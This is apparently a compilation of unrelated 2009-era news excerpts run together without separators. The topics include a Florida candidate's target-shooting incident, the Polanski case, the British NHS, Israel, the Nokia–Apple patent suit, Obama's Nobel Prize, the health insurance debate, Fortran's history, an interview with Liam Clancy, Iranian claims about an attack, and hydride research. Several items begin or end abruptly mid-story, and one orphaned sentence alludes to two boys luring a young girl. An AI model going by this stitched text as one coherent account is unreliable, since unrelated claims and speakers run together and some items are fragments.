MIAMI - A South Florida Republican said it was a mistake to shoot at a target with the initials of the Democratic congresswoman he is trying to unseat .
Candidate Robert Lowry made a brief statement to a local newspaper but refused to speak further yesterday about the incident , which happened Tuesday during a weekly GOP meeting held at a gun range .
Organizer Ed Napolitano defended the gathering , as well as the use of posters of what appeared to be gunmen with traditional Arab head scarves as targets .
“ That ’s our right , ’’ said Napolitano , president of the Southeast Broward Republican Club .
“ If we want to shoot at targets that look like that , we ’re going to go ahead and do that . ’’
Lowry told the South Florida Sun Sentinel that shooting at a target with the letters “ DWS ’’ - a not - so - veiled reference to US Representative Debbie Wasserman Schultz - was a “ joke , ’’ but then said it “ was a mistake . ’’
His campaign manager , Chris Leggatt , said yesterday : “ I do n’t think we need to make any further comment about it .
It ’s an issue that ’s been addressed . ’’
Wasserman Schultz , who made headlines earlier this year when she announced she had been battling breast cancer , represents a liberal district that includes a stretch of South Florida from Fort Lauderdale to Miami Beach .
She is expected to easily win reelection , though Lowry and three other GOP candidates are vying to face her .
© Copyright 2009 Globe Newspaper Company .
Mr. Wells ’s detailed description of having counseled Judge Laurence J. Rittenband on how to sentence Mr. Polanski , who pleaded guilty to one county of having unlawful sex with a minor , has been at the center of a hot legal fight over the case .
Even before Mr. Polanski was arrested last Saturday in Switzerland for possible extradition to the U. S. , his lawyers had asked the Los Angeles courts to throw his case out or allow another court to review it , because of alleged corruption in the local judicial system , particularly involving the actions described by Mr. Wells on film .
That matter is still pending before a California appellate court .
Chad Hummel , a lawyer for Mr. Polanski , declined to comment on Mr. Wells recantation .
Sandi Gibbons , a spokeswoman for the Los Angeles county district attorney ’s office , said : “ Anything we have to say will be in legal pleadings or in court . ”
Reached in Paso Robles , Calif. , on Wednesday , Mr. Wells said he had informed the district attorney ’s office of his lie several months ago , and offered to make a formal statement , though none was taken .
Mr. Wells said he was publicly recanting now , in order to clear his actions away from other issues in the Polanski case .
But he also acknowledged that the conduct he described in the 2007 documentary , “ Roman Polanski : Wanted and Desired , ” could have triggered an action against him before the state bar .
“ If it happened , it would have been unethical , ” Mr. Wells said .
With the UK economy in shambles , everyone expected the Labour Party , headed by Prime Minister Gordon Brown , to be defeated soundly in the next elections there .
However , US Republican Party attacks on the British National Health Service as part of their campaign to discredit US health care reform are receiving wide coverage there and are causing a backlash .
The NHS is so popular in the UK that virtually all politicians , including conservatives , support it , but British Conservative Party links to the US Republican party are causing it to lose popularity quickly .
First , Investor ’s Business Daily ran an anti-reform editorial claiming that “ scientist Stephen Hawking would n’t have a chance in the UK , where the National Health Service would say the life of this brilliant man , because of his physical handicaps , is essentially worthless . ”
They were forced to retract that when it was pointed out to them that Stephen Hawking is , indeed , British and lives in the UK .
Hawking even wrote an editorial ( electronically ) singing the praises of the NHS .
Then a Conservative Member of the European Parliament , appeared on US TV warning Americans against an NHS - style health care system .
UK conservatives tried to distance themselves from his comments , but the damage was already done .
Two UK newspapers , including one considered a conservative newspaper , ran articles revealing UK Conservative Party links to Republican NHS bashers .
The latest scandal comes from two British women who claim they were duped into appearing in anti-health reform ads broadcast in the US , and that their words were twisted to make it appear that they were against the NHS .
The two women were told that they were participating in a documentary about health care , and their statements were about proposed reforms to the NHS , which both women support .
Neither woman was told that their words would be used in an US ads .
The ads were sponsored by the Conservatives for Patients ’ Rights , which is run by Rick Scott .
Scott was forced to resign as the head of heath provider Columbia / HCA because of massive fraud at the company .
It is interesting that Britain ’s health care system , which goes far beyond anything proposed by Obama , is so popular in Britain that even the slightest hint that a party wants to dismantle it will cost them an election .
After the Oslo accords of 1993 , Arab states took steps to improve their relationships with Israel , allowing for recognition in the form of trade and consular agreements .
Israel , however , continued to construct settlements , making its neighbors understandably unwilling to give up more without a demonstration that they would be granted something in return .
Today , supporters of Israel cite the outdated 1988 Hamas charter , which called for the destruction of Israel , as evidence of Palestine ’s attitude toward a two - state solution , without considering the illegalities of Israel ’s own occupation .
Israel has never presented any comprehensive formulation of a peace plan .
Saudi Arabia , to the contrary , has done so twice : the Fahd peace plan of 1982 and the Abdullah peace initiative of 2002 .
Both were endorsed by the Arab world , and both were ignored by Israel .
In order to achieve peace and a lasting two - state solution , Israel must be willing to give as well as take .
A first step should be the immediate removal of all Israeli settlements in the West Bank .
Only this would show the world that Israel is serious about peace and not just stalling as it adds more illegal settlers to those already occupying Palestinian land .
At the same time , the international community must pressure Israel to relinquish its grip on all Arab territory , not as a means to gain undeserved concessions but instead as an act of good faith and a demonstration that it is willing to play by the Security Council ’s rules and to abide by global standards of military occupation .
The Arab world , in the form of the Arab peace initiative that was endorsed by 22 countries in 2002 , has offered Israel peace and normalization in return for Israeli withdrawal from all Arab territories including East Jerusalem  with the refugee issue to be solved later through mutual consent .
There have been increasing well - intentioned calls for Saudi Arabia to “ do a Sadat ” : King Abdullah travels to Israel and the Israelis reciprocate by making peace with Saudi Arabia .
However , those urging such a move must remember that President Anwar el - Sadat of Egypt went to Israel in 1977 to meet with Prime Minister Menachem Begin only after Sadat ’s envoy , Hassan el - Tohamy , Sadat ’s envoy , was assured by the Israeli foreign minister , Moshe Dayan , that Israel would withdraw from every last inch of Egyptian territory in return for peace .
Absent a similar offer today from Israel to the leaders of Palestine , Lebanon and Syria , there is no reason to look at 1977 as a model .
Yesterday we reported on Nokia 's lawsuit against Apple , in which they claim the iPhone is infringing on 10 of the company 's patents relating to GSM , UMTS and WLAN technologies .
Analysts have now had a chance to crunch the numbers and estimate that Apple could face shelling out between $ 200 million and $ 1 billion to satisfy the suit if successful — and go on to say that Nokia has a pretty good case .
They note that the major existing players in the mobile industry ( including Nokia , Motorola , Ericsson and Qualcomm ) have a lot of intellectual property locked up already , making licensing costs a " significant barrier for late entrants " into the cellular space like Apple .
Analyst Ben Wood was quoted as saying , " It is almost inconceivable that someone can produce a mobile phone without using Nokia patented technologies . "
Nokia says they 've been attempting to work out a licensing deal with Apple for some time , but their offers have been continually rejected — leading to the suit they filed in a U.S. District Court yesterday .
What do you think : will Apple be forced to pay the Finnish piper ?
Or will Apple wriggle its way out of Nokia 's grasp ?
As the AP analysis this morning puts it , “ But still … ? ”
In other words , really ?
Barack Obama ?
Nobel Peace Prize ?
So soon ?
Nine months ?
War still going in Iraq ?
Global Warming legislation bottled in Senate ?
Iran still defiant ?
Afghanistan still in need of more U.S. troops ?
Well , it may seem shocking to Americans , pleasantly for some , disturbingly for others .
But in fact , as Ronald Krebs explained in Foreign Policy , the Peace Prize has often been given for aspirational reasons , for potential achievements in the future as much as actual achievements from the past .
This is decidedly different from other Nobel prizes , like literature , economics or medicine .
The Nobel Peace Prize ’s aims are expressly political .
The Nobel committee seeks to change the world through the prize ’s very conferral , and , unlike its fellow prizes , the peace prize goes well beyond recognizing past accomplishments .
As Francis Sejersted , the chairman of the Norwegian Nobel Committee in the 1990s , once proudly admitted , “ The prize … is not only for past achievement . …
The committee also takes the possible positive effects of its choices into account [ because ] …
Nobel wanted the prize to have political effects .
Awarding a peace prize is , to put it bluntly , a political act . ”
It is therefore fair to ask whether the Nobel Peace Prize has changed the world .
The committee has insisted that the award works in subtle but perceptible ways to advance the winners ’ causes : by raising the profile of organizations and problems , by morally and politically bolstering the forces for peaceful conflict resolution , by attracting international attention to repression , and perhaps ultimately by facilitating pressure for liberalization .
Krebs goes on to explain that the Peace Prize aspirations are often unfulfilled .
But the 27 aspirational prizes awarded since 1971 have accomplished far less than the peace prize ’s advocates would have us believe .
In many of these cases , the media glare was already intense .
One would be hard - pressed to argue that the prize had much of an effect on international media coverage of South Africa ’s transition from apartheid ( 1993 ) , the Israeli - Palestinian conflict ( 1994 ) , or the troubles in Northern Ireland ( 1998 ) .
In cases in which the media was not already saturated , there have been some legitimate successes — notably Aung San Suu Kyi , whose 1991 award seems to have drawn attention to the Burmese predicament .
But a survey of headlines in LexisNexis ’s database of “ major worldwide newspapers ” reveals little evidence that the Nobel Peace Prize has typically boosted international media coverage beyond the short run .
I found this to be true of the Dalai Lama and Tibet ( 1989 ) , Rigoberta Menchú and the Guatemalan Civil War ( 1992 ) , and Shirin Ebadi and reform in Iran ( 2003 ) , among others .
Although the award can boost the personal prominence of individuals with low global media profiles ( such as Ebadi or 2004 winner Wangari Maathai ) , their causes nevertheless seem to continue to languish .
In point of fact , it is too soon to know how Obama ’s prize will be eventually judged by history .
As much as a celebration , this prize is another platform , and another responsibility , for Obama to use in the years to come .
Hard to believe that the expectations could have gone any higher .
A scathing insurance industry report was released on the eve of a crucial vote in the Senate Finance Committee on Tuesday .
| John Shinkle / POLITICO
Insurers face blowback after report
In the health care reform debate , where playing nice has been the rule , a scathing insurance industry report looked to critics Monday like a grenade aimed at scuttling progress in Congress .
But it also looked to some like too little , too late .
Advertisement
Not only did the report land many months into the debate — with Democrats on the cusp of passing bills through five committees — it infuriated some of the very people the industry group hoped to influence .
“ I do n’t view the impact of the report as a bill - stopper as much as a bill - changer , ” said Robert Blendon , a health policy pollster and political analyst at Harvard University .
“ The momentum is way too far [ in favor of passing a reform bill ] , and there is a sense out there that something has to be done . ”
On the eve of a crucial vote in the Senate Finance Committee on Tuesday , the industry group , America ’s Health Insurance Plans , raced against the White House and Senate Democrats to frame the 26 - page analysis conducted by PricewaterhouseCoopers , which concluded that premiums would cost more under the Finance Committee legislation than under the current system .
White House and Senate officials hinted at the possibility of legislative payback for releasing a report Democrats described as deeply flawed and self - serving .
At the very least , officials said , it will help Democrats close ranks behind the Finance Committee bill , which had come under fire from the progressives as too moderate .
They also predicted liberal lawmakers will go harder after the insurers , perhaps by proposing a cap on premiums or solidifying support for the government insurance plan .
“ They have opened themselves up , ” said a senior Senate Democratic aide .
“ It is an incredibly stupid strategic blunder .
If you are going to fire a shot like this , you fire a good shot . ”
AHIP chief Karen Ignagni defended the report as an effort to shape the congressional debate .
Insurers were counting on a mandate requiring Americans to own health insurance , and a penalty as high as $ 3,800 a family to require it .
But during the Finance Committee markup , that fee was cut to $ 1,500 per family and phased in over several years — leading PricewaterhouseCoopers to conclude that healthy people would n’t buy insurance and the notion of coverage - for - all would collapse .
The weak mandate , coupled with a requirement on insurers to provide coverage regardless of pre-existing conditions , will drive up the cost of health insurance premiums , so that the average family ’s premium could cost $ 4,000 more by 2019 , the report said .
“ Because we do n’t see comprehensive cost control in any piece of legislation , we ’re looking at continuing those projected 6.2 percentage point increases ” in annual health care costs , she said .
Against strong criticism from Democrats , Ignagni said she stood by the report , saying it was conducted by a “ world - class firm with a stellar reputation . ”
The timing of the report left longtime observers of the insurance industry scratching their heads .
Wendell Potter , a former executive at CIGNA who has been speaking out against insurance industry practices , said AHIP was responding to critical analyses from Wall Street that the weakened penalty will hurt private insurers .
“ Karen had no alternative because the CEOs were so determined to do something to try to sway the committee to back off the reductions .
She did n’t have an alternative , ” Potter said .
“ They are obviously doing this on the eve of the vote in the Senate Finance Committee , hoping enough members of the committee would be concerned , to restore it .
I think the strategy will backfire . ”
Ignagni made a high - profile promise to the president in March that she would work to pass a bill , and at least publicly , she was was welcomed at the table until now .
However , since the summer , both the White House and the industry have been increasingly at odds over the direction of reform , and the report seems to mark a final break .
Some Democrats yesterday even hinted that Ignagni released the report because the chief executives she represents were angered by a provision in the Senate Finance bill that would cap insurance executives ’ pay – a charge an Ignagni spokesman denied .
Others thought the insurers ' report was raising a central question in the debate that 's being overlooked -- will health reform really work the way Democrats promise ?
" It should make a lot of Democrats ask , ' What the hell are we doing here ? ' " said David Merritt , a health policy expert with the Gingrich Group .
" Truly , if they do n't do anything to change the underlying factors that make up insurance , what have they done to reform the system ?
It 's throwing good money after bad . "
Senate and White House officials blasted out emails critical of the industry throughout the day .
The network of liberal media and think tank groups -- nurtured over the years to respond at moments like this -- pushed back with wonky critiques that were then circulated by Democratic officials .
Senate Finance Committee staff convened an unusual late - afternoon conference call to debunk the analysis .
For example , Finance Committee aides said , the study assumes that a proposed 40 - percent fee on insurers that offer high - cost insurance , and more than $ 100 billion in taxes on the health care industry will be passed directly onto consumers without forcing any kind of behavioral changes by individuals or companies .
In essence , the study looked at the worst - case scenario and failed to consider mitigating forces such as tax credits to purchase insurance , Democrats said .
“ The misleading and harmful claims made by the profit - driven insurance companies are politicking for corporate gain at its worst , ” Sen . John Rockefeller ( D - W.Va . ) said in a statement .
“ Their recent statements only further highlight that our focus here in Congress must be on the inclusion of a public health insurance option in the marketplace to protect families and put more money back in their wallets by creating greater competition and driving down costs . ”
While Democrats were slamming the bill , Republicans did n’t rush out statements touting the findings .
Senate Minority Leader Mitch McConnell ( R - Ky . ) issued a tepid embrace of the report Monday , referring to it with the phrase “ outside experts . ”
“ Higher premiums , higher taxes , and more government — that ’s not reform .
But that ’s precisely what the American people , the Congressional Budget Office and now outside experts have identified with this trillion - dollar experiment that cuts Medicare , raises taxes and premiums and threatens the health care options that millions of Americans enjoy .
I think we ought to listen to the American people , rather than trying to jam through another 1,000 - page bill , ” McConnell said .
One possible reason for the Republican reticence — health insurance companies are viewed by the public as one of the least - trusted figures in the health care debate , Blendon said .
But Democrats may not be able to simply rely on Americans just dismissing the source , Blendon said .
They will need to actively debunk the charges by commissioning their own report , perhaps from the Congressional Budget Office or a panel of economic experts , he said .
That ’s because he said the report could reignite concerns among average Americans that the reform will not leave them better off than they are now .
“ In the world of politics , this is a serious accusation , ” Blendon said of the report .
“ People are really worried the bill will cost average middle income people more than they anticipated .
Someone is going to have to respond as to why these are not accurate assumptions . ”
The report alone seemed unlikely to scramble the Finance Committee vote .
Sen. Olympia Snowe ( R - Maine ) , who could support the bill Tuesday , does n’t agree with the individual mandate or the penalty — the two main parts of the legislation AHIP is trying to defend .
Snowe was the driving force behind reducing the original $ 3,800 fee .
A spokeswoman for Sen. Ron Wyden ( D - Ore. ) , an undeclared Finance Committee member , did not respond to a request for comment .
Rockefeller has also not declared how he will vote , but his comments show he is no fan of the insurance industry .
1956 : Fortran , the first modern computer language , is shared with the coding community for the first time .
Three years in the making , it would be refined in work that continues to this day .
While this ground - breaking " high level " language has been long eclipsed , it defined an approach to programming that still informs the art of computer science .
Back at the dawn of the computer age thinking machines were oversized , petulant infants that understood only their own , private , nearly incomprehensible languages .
There really was n't a pressing need to have languages that worked on every possible machine , there not being too many kinds yet .
So programs written using " assembly " or " low level " languages were good enough — even though they were difficult to learn , took lots of time to write and compile , and had no lasting value .
Unlike the software and web apps of today , which can run on different operating systems and platforms with , at worst , slight modifications , early languages ran only on the same series of computer .
A program written for a WingBat Series 51 could n't operate on a BatWing Series 15 , because it issued instructions based the unique architecture of the box on which and for which it was written .
Trying to port it would be like giving driving directions meant for a driver in Paris to someone walking around in Nairobi .
Enter John W. Backus , whose permanent place in computing history began on a stroll in midtown Manhattan in 1950 .
The 25 - year - old grad student , intrigued by a room - sized computer on display on the ground floor of IBM's New York City offices , wandered inside to get a closer look .
A tour guide learned he was studying math at Columbia University uptown and sent him upstairs for what would be a brief oral exam of " brain teasers . "
Backus was immediately hired — as a programmer .
" That was the way it was done in those days , " he would later tell The New York Times with a shrug .
After all of three years at IBM a very brash Backus had the audacity to request the considerable resources he'd need to pursue a major , open - ended project that nobody had any particular reason to believe could even necessarily be done .
As The New York Times recalled years later , the young man 's ambitions were lofty and laudable — but he also just wanted to make life easier on himself :
In 1953 , frustrated by his experience of " hand - to - hand combat with the machine , " Mr. Backus was eager to somehow simplify programming .
He wrote a brief note to his superior , asking to be allowed to head a research project with that goal .
" I figured there had to be a better way , " he said .
Mr. Backus got approval and began hiring , one by one , until the team reached 10 .
It was an eclectic bunch that included a crystallographer , a cryptographer , a chess wizard , an employee on loan from United Aircraft , a researcher from the Massachusetts Institute of Technology and a young woman who joined the project straight out of Vassar College .
Their baby was Fortran , aka " The IBM Mathematical __For__mula __Tran__slating System .
[ Ed. note :
It 's often spelled all uppercase , but not in Wired.com style . ]
The new language made programming , for the first time , more about the end than the means .
Customer code would not be shipped until April 1957 , but publication of the first Fortran manual ( .pdf ) on this day in 1956 kindled a revolution , according to Paul McJones , a member of the Computer History Museum 's Software Preservation Group and a friend and former colleague of Backus .
" John Backus and his Fortran project members almost single - handedly invented the ideas of both programming languages and ( optimizing ) compilers as we know them today — they deserve all the credit they can get , " McJones told Wired.com in an e-mail .
Some of that euphoria of the day is captured in an entry at " User Notes on Fortran Programming ( UNFP ) , " a sort of Wiki for the community :
The new invention caught quickly , no wonder ; programs computing nuclear power reactor parameters took now hours instead of weeks to write , and required much less programming skill .
Another great advantage of the new invention was that programs now became portable .
Fortran won the battle against assembly language , the first in a series of battles to come , and was adopted by the scientific and military communities and used extensively in the space program and military projects .
There are dozens of high - level languages now , but the propellerheads are n't done with Fortran — not by a long shot .
Photo : Matchbook cover labeled " Capt. Starn 's Restaurant and Bar , Atlantic City , New Jersey " , circa 1960 .
Given to Paul McJones by John Backus .
Used with permission .
Sources :
INTERVIEW : Before Van Morrison , before U2 , Ireland ( and the world ) had The Clancy Brothers and Tommy Makem .
A fine new documentary by Alan Gilsenan marks out the group 's sole survivor , Liam Clancy , as a storyteller of the highest calibre - and what a story , writes DONALD CLARKE
THE SHELBOURNE HOTEL has been squatting on St Stephen 's Green for more than 150 years , but , to people of a certain age , its bars and staircases always summon up memories of the 1970s .
Before luxury hotels sprung up on every Dublin corner , the Shelbourne served as a vital way station for the era 's key celebrities .
Look : there 's Richard Harris and John Huston .
Is that Edna O'Brien sharing a glass with JP Donleavy ?
Hang around long enough and you would surely catch sight of a Clancy brother .
While Van Morrison was still something of a niche act , and U2 were just shedding their bondage nappies , The Clancy Brothers and Tommy Makem remained the closest thing the country had to a musical supergroup .
They were , of course , never exactly cool .
Dressed in thick jumpers and fishermen 's caps , they sang the sort of ballads to which even Americans knew the words .
But they were very famous indeed .
So , the Shelbourne seems like the right place to meet the mighty Liam Clancy .
Possessor of a voice that is both sweet and booming , Liam is , sadly , the last member of the group still above ground .
Now , having said goodbye to Bobby , Tom and Paddy Clancy and , as recently as 2007 , having lost his old mate Tommy Makem , Liam Clancy remains an avatar of a lost age .
It must make a man think .
" It 's inevitable .
Everything passes , " he says , before reaching for an oxygen cylinder and attaching the tubes to his nose for a spell .
" I am on my last legs .
I need a bit of oxygen every now and then .
I got this virus in California , and it attacked my immune system .
It 's called pulmonary fibrosis - scarring of the lungs .
That 's what killed my brother .
There 's no cure , but it seems to be moving quite slowly in my case . "
Yet it can't be denied that he looks rather fabulous .
Still proudly wearing his trademark cap , his feet wriggling in the Shelbourne 's slippers , Clancy is a good colour and , despite his pulmonary difficulties , he has no difficulty belting out an array of disgraceful , well - structured yarns .
That talent is also on display in a fine new documentary entitled T he Yellow Bittern : The Life and Times of Liam Clancy .
Alan Gilsenan 's film places Liam in a huge hangar at Ardmore Studios , and sets him loose on one of the great show - business sagas .
The youngest of the Clancy brothers - the other three of whom all served in the RAF during the second World War - Liam , now 74 , was raised among the unglamorous streets of Carrick - on - Suir , Co Tipperary .
Looking back , he remembers the country as being " run by Ayatollahs " , and remarks that his home area had " barely changed since medieval times " .
It must , therefore , have been a shock to encounter an exotic American moneybags with a crate of recording equipment .
Diane Guggenheim , heiress to the mining empire that bears her name , developed an enthusiasm for Irish folk music and , in the mid-1950s , toured Ireland in search of strong singers .
Liam was swept along by her enthusiasm , and accompanied her to Armagh , where she recorded Tommy Makem 's mother , the renowned folk singer Sarah Makem .
Later , Guggenheim lured Clancy , whose ambitions were then in acting , to New York , and introduced him to bohemian Greenwich Village .
But it soon transpired that she had developed a dangerous obsession with the young Tipperary man .
" She was 32 and I was 19 .
She was twice - divorced and I had been brought up a strict Catholic , " he marvels .
" And , of course , I 'd never come across anybody who had been deep in psychoanalysis before .
Later I saw the movie Fatal Attraction , and I thought : ' Jesus , that 's what I went through with Diane . '
Except those two characters were from the same culture .
At that point , the extent of my world was the rain - sodden streets of Carrick - on - Suir . "
Guggenheim threatened to commit suicide when Clancy refused to have sex with her , and the unfortunate woman eventually ended up in a mental institution .
By this point , Clancy , deeply disturbed by the incident , had put his acting ambitions on hold , and was allowing the lucrative distractions of folk music to lead him elsewhere .
" Tommy Makem had gone to New Hampshire , working on the cotton mills , " he explains .
" We had agreed to meet later in New York , and get into acting .
We eventually got a job together playing two priests .
Then , while we were doing that , a club opened called The Fifth Peg , later known as Gerde 's Folk City .
Now , whereas acting paid $ 45 a week , we got $ 125 for singing a few songs .
There 's no choice there . "
In The Yellow Bitternwe hear how , in later years , following innumerable fallings out between the group , Tommy Makem became a somewhat austere fellow .
The impression given is that he was the puritanical northerner to the Clancys ' more dissolute Munster men .
" Ah no .
That only emerged later on , " he says slightly sadly .
" He was as devil - may - care as the rest .
He was a joker , always great fun .
He got serious somewhere along the line . "
Gerde 's Folk City was the club where Bob Dylan played his first professional gig , and the great man is quoted on the poster of The Yellow Bittern , describing Liam as " the best ballad singer I ever heard in my life " .
It was , however , as part of a group that Clancy finally encountered proper fame .
He had never known his older brothers as adults and , when he met up with them in New York , he was slightly appalled to discover that they had American accents .
Still , he plugged his ears , and , with Makem in tow , became part of the world - conquering The Clancy Brothers and Tommy Makem .
Their big break came in 1961 , during an appearance on The Ed Sullivan Show .
The headline act cancelled and , originally booked to do just two songs , the group stormed their way through a triumphant 20 - minute set .
A year later , the boys sold out Carnegie Hall .
" After The Ed Sullivan Show , crowds suddenly began stopping us on the street , looking for autographs , " he says .
" I remember Tom looking around and saying : ' Jesus .
We 're f***ing famous ! '
Then straight into Carnegie Hall , and then a tour round England .
" Then we branched into Australia .
I remember somebody once asking if we 'd planned all this .
There was no time to plan .
It 's like we were thrown onto a raft on the Colorado rapids for 10 years .
It was all we could do to keep afloat . "
The Yellow Bitternshould help Liam Clancy recover some of the respect he deserves .
The group recorded stirring , skull - rattling versions of songs such as Kevin Barryand Brennan on the Moorand , in the mid-1960s , their albums sold by the lorry - load in Ireland .
Some more puritanical folk musicians were , however , a tad suspicious of the show - business aura that hung about them .
With those jumpers and those hats , The Clancy Brothers and Tommy Makem did conform to certain stereotypes of the stage Irishman .
Clancy laughs good - naturedly .
" We had a manager , Marty Erlichman , " he says .
" He once asked us to cut 10 minutes from our show to give this unknown girl a break : Barbra Streisand .
Anyway , Marty said to us : ' I can make you stars if you do what I tell you . '
We came home after Christmas and my mother had knitted these sweaters .
We brought them back and Marty said : ' That 's it !'
You have to remember it was part of the business then .
You had to have an identity .
Marty insisted . "
Clancy goes on to explain how , much later , he received a letter from a knitwear manufacturer in Donegal who , by the mid-1960s , was preparing to emigrate .
The sweater craze took off , and he was able to remain at home , marry the girl he loved and create a large family .
Indeed , you might argue that all those jumper shops in Nassau Street , Dublin airport and every other Irish tourist trap would not exist if Marty had not had his sartorial brainwave .
Yes , the Clancys created one ideal of the robust , cosily dressed Paddy .
" God yeah , for years they were called Clancy Brothers sweaters , " a currently sweaterless Liam says .
" That 's our sackcloth and ashes .
I tell you , they were good for one thing : keeping the weight down .
You sweated so much you never got fat . "
The Clancys may not have been cool , but , if contemporaneous records are to be believed , they could have drunk a combined force of Mötley Crüe , Black Sabbath and Lynyrd Skynyrd under the table , out the door and into the gutter .
Nobody ever confused Liam Clancy with Val Doonican .
" I looked at one of our set lists .
I found it in an old suitcase .
We once did 35 concerts in 21 nights , " he says .
" Of course there was a lot of drink .
We 'd fuel up with whiskey to get up to speed on our way to the next gig .
There were a hell of a lot of parties .
We were under contract to Playboy , I remember .
Hugh Hefner would have these parties and there 'd be all this champagne about .
We were given these little champagne glasses and he'd say : ' You do n't give an Irishman a glass that size . '
We ended up with tankards of champagne . "
Even if you have n't heard the Clancy myth , you can probably guess where this story is heading .
As the jolly 1960s mutated into the less merry 1970s , the group encountered all the usual rock 'n ' roll calamities .
One accountant made a mess of their taxes , and his replacement only managed to get them deeper in debt .
Personal feuds developed and , eventually , giving in to the pressures of work and bad living , Liam Clancy suffered a very serious breakdown .
He describes the incident movingly in The Yellow Bittern .
" It was much more than just the drink , " he says .
" It 's something that runs in the family .
I can remember , as a teenager , people saying my mother ' suffered with her nerves ' .
I had anxiety attacks and panic attacks .
And the stress of touring brought it on again . "
He admits that , even now , he occasionally suffers from " his nerves " .
Still , there is no doubting that Liam Clancy is one of the great survivors .
In the 1970s , broke and without a recording contract , he made his way to Canada and embarked on a notable television career .
Eventually , he made up with Tommy Makem and , until 1988 , the two men performed throughout the world as a successful duo .
Further reconciliations came with his brothers and , in 1996 , four decades after they ran into one another in New York , an incarnation of The Clancy Brothers took to the road again .
Throughout all the glories and catastrophes , Clancy has kept a home in Ring , Co Waterford .
He still lives there with his wife , and maintains that pottering about the area is the thing that has " kept him sane " .
Mind you , for all his eccentricities , Liam Clancy strikes me as a man with a proper sense of his place in the world .
Early on in our conversation , he tells a lengthy anecdote about travelling from Alaska to Los Angeles with Tommy Makem in the early 1980s .
The flight took them past an erupting Mount St Helens and , eventually , to the smog and noise of southern California .
" You just see this liquefied , vaporised manure in the air , " he says .
" Then you suddenly realise there is a human settlement in there .
Below you see these homes full of stars , who think the world can't get by without them .
Then you are at the concert , and you , who would be this infinitesimal speck from the air , are playing before all these other specks .
You have to keep that sense of perspective . "
What an impressive figure this man is .
He may require oxygen to get through the day .
He may not be able to sing any more .
But he still looks as if he could chew the average contemporary celebrity into gristle .
" I 'm doing fine , for the most part , " he smiles .
" For a guy who 's dying , I 'm not doing too bad . "
Well , I think Liam Clancy 's pretty darn cool .
The Yellow Bittern : The Life and Times of Liam Clancyis on general release
TEHRAN --
There is evidence that proves that the U.S. and British forces in Afghanistan were behind the recent terrorist attack in southeastern Iran , Tehran ’s ambassador to Kuwait said on Thursday .
On Sunday October 18 , a terrorist attack killed over 40 people , including five senior commanders of the Islamic Revolution Guards Corps , in the southeastern province of Sistan - Baluchestan .
The terrorist group Jundullah , which is also known as the Rigi group because it is led by Abdul - Malek Rigi , claimed responsibility for the attack , which was carried out in the city of Pishin , near the border with Pakistan .
“ There are documents and evidence proving that U.S. and British forces in Afghanistan had a hand in the incident , ” Ambassador Ali Jannati told reporters at the Iranian Embassy in Kuwait City .
These forces were in continuous contact with the terrorist cells and provided them weapons and financial support , he added .
According to some other documents , the terrorist cells were also supported by Pakistan ’s intelligence and security forces in Pakistan , he noted .
Elsewhere in his remarks , Jannati said the United States overthrew Saddam Hussein ’s regime and launched its campaign against the Taliban forces in Afghanistan to protect U.S. interests in the region and not to support Iran .
“ Of course we have taken advantage of the new situation , but ( we ) have documents that prove the U.S. and Britain supported these terrorist groups in Pakistan , ” he added .
He went on to say that some Iranians believe Saudi Arabia is supporting terrorist groups and a number of them recently held a demonstration in front of the Saudi Arabian Embassy in Tehran
Hydrogen - rich Material Promises Advances in Energy Transmission , Fuel Storage
Researchers at the Stanford Institute for Materials and Energy Science , a joint institute of SLAC and Stanford University , have produced a hydrogen - rich alloy that could provide insight into the properties of metallic hydrogen , according to a study published online August 19 in Proceedings of the National Academy of Sciences .
The work is a step toward materials with revolutionary implications for energy science , enabling lossless power transmission , next - generation particle accelerators and even magnetic levitation .
Metallic hydrogen is a state of hydrogen predicted to form under ultra - high pressure .
If achieved , some researchers predict it could function as a room - temperature superconductor — a material capable of conducting electricity with zero resistance at temperatures above 0 degrees Celsius .
But because the pressure required to make metallic hydrogen is so enormous — much greater the pressure experienced by materials in the center of the earth — researchers have had little luck in producing it .
" People are very interested in hydrogen because it 's element one , " said SIMES physicist Wendy Mao , who was a co-author on the study .
" At high enough pressure , it should be metallic and it should be a room temperature superconductor . "
In hopes of getting a better idea of how metallic hydrogen behaves , researchers are becoming increasingly interested in hydrogen - rich compounds that might have properties similar to those seen in pure hydrogen .
Called hydrides , the chemicals might undergo similar phase changes as metallic hydrogen , but at more accessible pressures .
One of the most promising candidates of study is called silane , which contains an atom of silicon bound to four atoms of hydrogen .
Previous studies have suggested that pure silane metalizes at pressures far lower than those required to produce metallic hydrogen .
The goal for Mao's group was to study the properties of alloys composed of hydrogen and silane together .
" People have already identified pure silane as a superconductor , " she said .
" The next step is to determine what happens if you have something that is mostly hydrogen with a little bit of silane .
Maybe you can get something closer to hydrogen . "
For the study , Mao and her colleagues studied two different silane - containing samples : one containing equal parts hydrogen and silane , another containing an abundance of hydrogen in a five - to - one ratio .
Using a device called a diamond anvil cell , the samples were squeezed between a pair of diamonds , generating pressures upwards of 6 gigapascals — 60,000 times the earth 's atmospheric pressure at sea level .
Aside from being one of the few materials suited to withstand the high pressures , diamond also provides researchers a window into the process , allowing them to conduct analyses of the pressurized samples .
The alloys solidified at much lower pressures than would be required for hydrogen alone , with the hydrogen - rich alloy forming a solid containing more than 99 percent hydrogen .
The researchers also found that even though the amount of silane in the hydrogen - rich sample was minimal , it had a dramatic effect on hydrogen - hydrogen interactions .
According to Shibing Wang , a SIMES graduate student and the lead author on the paper , the finding is significant because it could contribute to a better understanding of the properties of atoms in hydrogen alloys , which are commonly used in hydrogen storage and could have implications for hydrogen fuel storage .
" The interaction between hydrogen and its environment is definitely more complicated than we expected , " Wang said .
" I 'm quite sure this is true for other hydrides that have potential hydrogen storage capabilities . "
The study was funded through SIMES by the Department of Energy .
— Nicholas Bock
SLAC Today , August 20 , 2009
One resident , who asked not to be named , said : “ The little girl was playing on her own when the two boys came up to her and enticed her to where they keep the bins between the flats .
The most widely touted outcome of last week 's Geneva talks with Iran was the " agreement in principle " to send approximately one nuclear - weapon 's worth of Iran 's low enriched uranium ( LEU ) to Russia for enrichment to 19.75 % and fabrication into fuel rods for Tehran 's research reactor .
President Barack Obama says the deal represents progress , a significant confidence - building measure .
In fact , the agreement constitutes another in the long string of Iranian negotiating victories over the West .
Any momentum toward stricter sanctions ...
One of the most unique and common forms of art on the Internet these days is called concept art .
Concept art is a form of illustration where the main goal is to convey a visual representation of a design , idea , and / or mood for use in movies , video games , animation , or comic books before it is put into the final product .
The concept artist generates a visual design for something that does n’t yet exist .
Most of these pieces are created with Photoshop as well as using more traditional means such as oil paints , pencils and others .
